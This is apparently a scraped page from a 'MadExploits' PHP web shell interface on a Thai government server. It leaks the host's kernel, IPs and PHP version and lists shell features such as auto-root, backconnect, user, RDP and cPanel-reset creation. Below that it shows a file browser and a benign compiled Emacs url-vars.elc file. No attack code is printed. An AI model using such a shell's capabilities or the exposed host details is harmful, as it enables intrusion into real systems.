Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
url /
[ HOME SHELL ]
Name
Size
Permission
Action
url-about.elc
2.7
KB
-rw-r--r--
url-auth.elc
10.21
KB
-rw-r--r--
url-cache.elc
5.79
KB
-rw-r--r--
url-cid.elc
1.44
KB
-rw-r--r--
url-cookie.elc
15.75
KB
-rw-r--r--
url-dav.elc
21.04
KB
-rw-r--r--
url-dired.elc
2.98
KB
-rw-r--r--
url-expand.elc
4.48
KB
-rw-r--r--
url-file.elc
7.68
KB
-rw-r--r--
url-ftp.elc
979
B
-rw-r--r--
url-gw.elc
7.17
KB
-rw-r--r--
url-handlers.elc
15.91
KB
-rw-r--r--
url-history.elc
5.29
KB
-rw-r--r--
url-http.elc
32.76
KB
-rw-r--r--
url-imap.elc
2.32
KB
-rw-r--r--
url-irc.elc
2.88
KB
-rw-r--r--
url-ldap.elc
6.4
KB
-rw-r--r--
url-mailto.elc
3.19
KB
-rw-r--r--
url-methods.elc
4.47
KB
-rw-r--r--
url-misc.elc
3.43
KB
-rw-r--r--
url-news.elc
7.51
KB
-rw-r--r--
url-nfs.elc
4.47
KB
-rw-r--r--
url-ns.elc
2.36
KB
-rw-r--r--
url-parse.elc
14.35
KB
-rw-r--r--
url-privacy.elc
1.88
KB
-rw-r--r--
url-proxy.elc
1.84
KB
-rw-r--r--
url-util.elc
12.18
KB
-rw-r--r--
url-vars.elc
13.65
KB
-rw-r--r--
url.elc
7.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : url-vars.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:05:26 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/url/url-vars.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`url-vars.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (require 'mm-util) #@32 Version number of URL package. (defconst url-version "Emacs" (#$ . 630)) (byte-code "\300\301\302\303\304\305\306\307&\210\300\310\302\311\312\313\306\301&\210\300\314\302\315\312\313\312\316\306\301& \210\300\317\302\320\312\313\306\301&\210\300\321\302\322\312\313\306\301&\207" [custom-declare-group url nil "Uniform Resource Locator tool." :version "22.1" :group hypermedia url-file "URL storage." :prefix "url-" url-cache "URL cache." "url-cache-" url-mime "MIME options of URL." url-hairy "Hairy options of URL."] 10) #@45 A parsed representation of the current URL. (defvar url-current-object nil (#$ . 1164)) #@66 A parsed representation of the MIME headers for the current URL. (defvar url-current-mime-headers nil (#$ . 1258)) (mapc 'make-variable-buffer-local '(url-current-object url-current-referer url-current-mime-headers)) #@315 *Whether to do automatic page reloads. These are done at the request of the document author or the server via the `Refresh' header in an HTTP response. If nil, no refresh requests will be honored. If t, all refresh requests will be honored. If non-nil and not t, the user will be asked for each refresh request. (custom-declare-variable 'url-honor-refresh-requests 't '(#$ . -1482) :type '(choice (const :tag "off" nil) (const :tag "on" t) (const :tag "ask" 'ask)) :group 'url-hairy) #@76 *If non-nil, all documents will be automatically cached to the local disk. (custom-declare-variable 'url-automatic-caching 'nil '(#$ . -1974) :type 'boolean :group 'url-cache) #@187 *A function determining if a cached item has expired. It takes two times (numbers) as its arguments, and returns non-nil if the second time is 'too old' when compared to the first time. (custom-declare-variable 'url-cache-expired '(lambda (t1 t2) (>= (- (car t2) (car t1)) 5)) '(#$ . -2157) :type 'function :group 'url-cache) #@28 Where to send bug reports. (defconst url-bug-address "bug-gnu-emacs@gnu.org" (#$ . 2489)) #@102 *Your full email address. This is what is sent to HTTP servers as the FROM field in an HTTP request. (custom-declare-variable 'url-personal-mail-address 'nil '(#$ . -2586) :type '(choice (const :tag "Unspecified" nil) string) :group 'url) #@163 *The filename to look for when indexing a directory. If this file exists, and is readable, then it will be viewed instead of using `dired' to view the directory. (custom-declare-variable 'url-directory-index-file '"index.html" '(#$ . -2832) :type 'string :group 'url-file) #@1062 How private you want your requests to be. HTTP has header fields for various information about the user, including operating system information, email addresses, the last page you visited, etc. This variable controls how much of this information is sent. This should a symbol or a list. Valid values if a symbol are: none -- send all information low -- don't send the last location high -- don't send the email address or last location paranoid -- don't send anything If a list, this should be a list of symbols of what NOT to send. Valid symbols are: email -- the email address os -- the operating system info lastloc -- the last location agent -- do not send the User-Agent string cookie -- never accept HTTP cookies Samples: (setq url-privacy-level 'high) (setq url-privacy-level '(email lastloc)) ;; equivalent to 'high (setq url-privacy-level '(os)) ::NOTE:: This variable controls several other variables and is _NOT_ automatically updated. Call the function `url-setup-privacy-info' after modifying this variable. (custom-declare-variable 'url-privacy-level ''(email) '(#$ . 3113) :initialize 'custom-initialize-default :set #[(sym val) "\302 \"\210\303 \207" [sym val set-default url-setup-privacy-info] 3] :type '(radio (const :tag "None (you believe in the basic goodness of humanity)" :value none) (const :tag "Low (do not reveal last location)" :value low) (const :tag "High (no email address or last location)" :value high) (const :tag "Paranoid (reveal nothing!)" :value paranoid) (checklist :tag "Custom" (const :tag "Email address" :value email) (const :tag "Operating system" :value os) (const :tag "Last location" :value lastloc) (const :tag "Browser identification" :value agent) (const :tag "No cookies" :value cookie))) :group 'url) #@37 Do not do decompression if non-nil. (defvar url-inhibit-uncompression nil (#$ . 4914)) #@74 *An alist of file extensions and appropriate content-transfer-encodings. (custom-declare-variable 'url-uncompressor-alist ''((".z" . "x-gzip") (".gz" . "x-gzip") (".uue" . "x-uuencoded") (".hqx" . "x-hqx") (".Z" . "x-compress") (".bz2" . "x-bzip2")) '(#$ . -5007) :type '(repeat (cons :format "%v" (string :tag "Extension") (string :tag "Encoding"))) :group 'url-mime) #@258 *This function will be called whenever URL needs to send mail. It should enter a mail-mode-like buffer in the current window. The commands `mail-to' and `mail-subject' should still work in this buffer, and it should use `mail-header-separator' if possible. (custom-declare-variable 'url-mail-command ''compose-mail '(#$ . -5383) :type 'function :group 'url) #@171 *An alist of schemes and proxy servers that gateway them. Looks like (("http" . "hostname:portnumber") ...). This is set up from the ACCESS_proxy environment variables. (custom-declare-variable 'url-proxy-services 'nil '(#$ . -5748) :type '(repeat (cons :format "%v" (string :tag "Protocol") (string :tag "Proxy"))) :group 'url) #@28 *Rely solely on the cache? (custom-declare-variable 'url-standalone-mode 'nil '(#$ . -6084) :type 'boolean :group 'url-cache) #@53 Characters allowable in a MIME multipart separator. (defvar url-mime-separator-chars (mapcar 'identity "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'()+_,-./=?") (#$ . 6216)) #@203 *List of ports to warn the user about connecting to. Defaults to just the mail, chargen, and NNTP ports so you cannot be tricked into sending fake mail or forging messages by a malicious HTML document. (custom-declare-variable 'url-bad-port-list ''("25" "119" "19") '(#$ . -6416) :type '(repeat (string :tag "Port")) :group 'url-hairy) #@65 Regexp used in parsing `Content-Type' for a charset indication. (defvar url-mime-content-type-charset-regexp ";[ ]*charset=\"?\\([^\"]+\\)\"?" (#$ . 6758)) #@41 Any data to send with the next request. (defvar url-request-data nil (#$ . 6921)) #@101 A list of extra headers to send with the next request. Should be an assoc list of headers/contents. (defvar url-request-extra-headers nil (#$ . 7010)) #@41 The method to use for the next request. (defvar url-request-method nil (#$ . 7167)) #@65 *String to send in the Accept-encoding: field in HTTP requests. (defvar url-mime-encoding-string nil (#$ . -7257)) #@120 Generate a list of preferred MIME charsets for HTTP requests. Generated according to current coding system priorities. (defalias 'url-mime-charset-string #[nil "\305\306!\205= \306\307 \307\211\203' @\310\n@!\203 \n@BA\211\204 *\237)!\311\312\f\211A@\"\313\314\f\315#\316Q)\207" [accum mm-mime-mule-charset-alist elt --dolist-tail-- ordered fboundp sort-coding-systems nil mm-coding-system-p format "%s;q=1, " mapconcat symbol-name ";q=0.5, " ";q=0.5"] 6 (#$ . 7379)]) #@188 *String to send in the Accept-charset: field in HTTP requests. The MIME charset corresponding to the most preferred coding system is given priority 1 and the rest are given priority 0.5. (defvar url-mime-charset-string (url-mime-charset-string) (#$ . -7869)) (defalias 'url-set-mime-charset-string #[nil "\300 \211\207" [url-mime-charset-string] 2]) (add-hook 'set-language-environment-hook 'url-set-mime-charset-string) #@460 *String to send in the Accept-language: field in HTTP requests. Specifies the preferred language when servers can serve documents in several languages. Use RFC 1766 abbreviations, e.g.: `en' for English, `de' for German. A comma-separated specifies descending order of preference. The ordering can be made explicit using `q' factors defined by HTTP, e.g. `de,en-gb;q=0.8,en;q=0.7'. `*' means get the first available language (as opposed to the default). (custom-declare-variable 'url-mime-language-string 'nil '(#$ . -8298) :type '(radio (const :tag "None (get default language version)" :value nil) (const :tag "Any (get first available language version)" :value "*") (string :tag "Other")) :group 'url-mime :group 'i18n) #@69 String to send to the server in the Accept: field in HTTP requests. (defvar url-mime-accept-string nil (#$ . 9032)) #@38 Version number of package using URL. (defvar url-package-version nil (#$ . 9154)) #@28 Name of package using URL. (defvar url-package-name nil (#$ . 9242)) #@32 What type of system we are on. (defvar url-system-type nil (#$ . 9317)) #@20 What OS we are on. (defvar url-os-type nil (#$ . 9395)) #@118 *Maximum number of times a password will be prompted for. Applies when a protected document is denied by the server. (custom-declare-variable 'url-max-password-attempts '5 '(#$ . -9458) :type 'integer :group 'url) #@28 *Where temporary files go. (custom-declare-variable 'url-temporary-directory '(or (getenv "TMPDIR") "/tmp") '(#$ . -9678) :type 'directory :group 'url-file) (make-obsolete-variable 'url-temporary-directory 'temporary-file-directory "23.1") #@157 *Whether to show a running total of bytes transferred. Can cause a large hit if using a remote X display over a slow link, or a terminal with a slow modem. (custom-declare-variable 'url-show-status 't '(#$ . -9925) :type 'boolean :group 'url) #@82 Either nil or the fully qualified proxy URL in use, e.g. http://www.example.com/ (defvar url-using-proxy nil (#$ . 10174)) #@198 *The default news server from which to get newsgroups/articles. Applies if no server is specified in the URL. Defaults to the environment variable NNTPSERVER or "news" if NNTPSERVER is undefined. (custom-declare-variable 'url-news-server 'nil '(#$ . -10304) :type '(choice (const :tag "None" :value nil) string) :group 'url) #@55 A regular expression that will match an absolute URL. (defvar url-nonrelative-link "\\`\\([-a-zA-Z0-9+.]+:\\)" (#$ . 10636)) #@154 *The maximum number of redirection requests to honor in a HTTP connection. A negative number means to honor an unlimited number of redirection requests. (custom-declare-variable 'url-max-redirections '30 '(#$ . -10768) :type 'integer :group 'url) #@213 *What function to use for asking yes or no functions. Possible values are `yes-or-no-p' or `y-or-n-p', or any function that takes a single argument (the prompt), and returns t only if a positive answer is given. (custom-declare-variable 'url-confirmation-func ''y-or-n-p '(#$ . -11022) :type '(choice (const :tag "Short (y or n)" :value y-or-n-p) (const :tag "Long (yes or no)" :value yes-or-no-p) (function :tag "Other")) :group 'url-hairy) #@393 *The type of gateway support to use. Should be a symbol specifying how to get a connection from the local machine. Currently supported methods: `telnet': Run telnet in a subprocess to connect; `rlogin': Rlogin to another machine to connect; `socks': Connect through a socks server; `tls': Connect with TLS; `ssl': Connect with SSL (deprecated, use `tls' instead); `native': Connect directy. (custom-declare-variable 'url-gateway-method ''native '(#$ . -11471) :type '(radio (const :tag "Telnet to gateway host" :value telnet) (const :tag "Rlogin to gateway host" :value rlogin) (const :tag "Use SOCKS proxy" :value socks) (const :tag "Use SSL/TLS for all connections" :value tls) (const :tag "Use SSL for all connections (obsolete)" :value ssl) (const :tag "Direct connection" :value native)) :group 'url-hairy) #@36 Has setup configuration been done? (defvar url-setup-done nil (#$ . 12290)) (byte-code "\301B\302\303!\210\304B\305\306!\210\307B\310\307!\204 \311\307\312\"\210\313B\310\313!\204. \311\313\314\"\210\301\207" [current-load-list url-weekday-alist (lambda (#1=#:defconst-tmp-var) (defconst url-weekday-alist #1#)) (("Sunday" . 0) ("Monday" . 1) ("Tuesday" . 2) ("Wednesday" . 3) ("Thursday" . 4) ("Friday" . 5) ("Saturday" . 6) ("Tues" . 2) ("Thurs" . 4) ("Sun" . 0) ("Mon" . 1) ("Tue" . 2) ("Wed" . 3) ("Thu" . 4) ("Fri" . 5) ("Sat" . 6)) url-monthabbrev-alist (lambda (#2=#:defconst-tmp-var) (defconst url-monthabbrev-alist #2#)) (("Jan" . 1) ("Feb" . 2) ("Mar" . 3) ("Apr" . 4) ("May" . 5) ("Jun" . 6) ("Jul" . 7) ("Aug" . 8) ("Sep" . 9) ("Oct" . 10) ("Nov" . 11) ("Dec" . 12)) url-lazy-message-time default-boundp set-default 0 url-extensions-header "Security/Digest Security/SSL"] 3) #@35 *A syntax table for parsing URLs. (defvar url-parse-syntax-table (copy-syntax-table emacs-lisp-mode-syntax-table) (#$ . -13192)) (byte-code "\301\302\303#\210\301\304\303#\210\301\305\306#\210\301\307\310#\210\301\311\312#\207" [url-parse-syntax-table modify-syntax-entry 39 "\"" 96 60 "(>" 62 ")<" 47 " "] 4) #@54 *Hooks to be run after initializing the URL library. (defvar url-load-hook nil (#$ . -13513)) (byte-code "\301B\302\303!\207" [current-load-list url-working-buffer (lambda (#1=#:defconst-tmp-var) (defconst url-working-buffer #1#)) " *url-work"] 2) #@144 Non-nil means don't open new network connections. This should be set, e.g. by mail user agents rendering HTML to avoid `bugs' which call home. (defvar url-gateway-unplugged nil (#$ . 13770)) (provide 'url-vars)
Close